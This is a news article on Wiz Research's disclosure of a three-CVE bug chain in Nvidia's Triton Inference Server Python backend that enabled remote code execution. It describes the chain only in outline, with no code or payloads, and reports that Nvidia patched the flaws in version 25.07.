Security researchers have lifted the lid on a chain of high-severity vulnerabilities that could lead to remote code execution (RCE) on Nvidia's Triton Inference Server.

Wiz Research said that if the three vulnerabilities they discovered and reported to Nvidia were exploited successfully, the potential consequences could include AI model theft, sensitive data breaches, manipulation of AI model responses, or attackers moving into other areas of the network.

Nvidia has now patched the bugs affecting Triton Inference Server, an open source platform for running AI models and serving them to user-facing apps. Triton Inference Server was designed by Nvidia to be able to run models from any major AI framework, and it does this using different backends, each of which is dedicated to a specific framework.

Triton's Python backend, however, is called upon by frameworks other than Python itself, making it one of the most versatile backends that the server supports. 

This wider reliance on Python means that any security weaknesses found here could significantly increase the number of organizations affected.

The first vulnerability (CVE-2025-23320 7.5) relates to a bug in the Python backend, triggered by exceeding the shared memory limit, using a very large request. This causes an error message that reveals the unique name (key) of the backend's internal IPC shared memory region in full.

Using the newfound unique memory region name, attackers can combine it with the public shared memory API to take control of a Triton Inference Server.

An attacker can take advantage of this API's sub-par validation to exploit out-of-bounds write and read bugs CVE-2025-23319 (8.1) and CVE-2025-23334 (5.9) respectively. 

Because the API fails to check whether the attacker-supplied key (the unique shared memory name) corresponds to a legitimate user-owned region or a private internal one, Triton will accept the attacker's registration endpoint request, allowing them to read from and write to that region.

With the ability to manipulate the backend's shared memory, attackers can gain full control of the server.

Wiz did not say whether the bug chain had been exploited in the wild, adding that it would refrain from publishing further details at this time.

"This research demonstrates how a series of seemingly minor flaws can be chained together to create a significant exploit," said the team behind the findings. "A verbose error message in a single component [and] a feature that can be misused in the main server were all it took to create a path to potential system compromise. 

"As companies deploy AI and ML more widely, securing the underlying infrastructure is paramount. This discovery highlights the importance of defense-in-depth, where security is considered at every layer of an application."

Nvidia confirmed that all three security flaws were patched in version 25.07, which was released on August 4, and all versions prior are vulnerable.

The Wiz team said: "We would like to thank the Nvidia security team for their excellent collaboration and swift response.

"We strongly recommend all Triton Inference Server users update to the latest version."

Triton has been used for several years by organizations of various sizes, although Nvidia launched Dynamo earlier this year, which is positioned as Triton's successor. �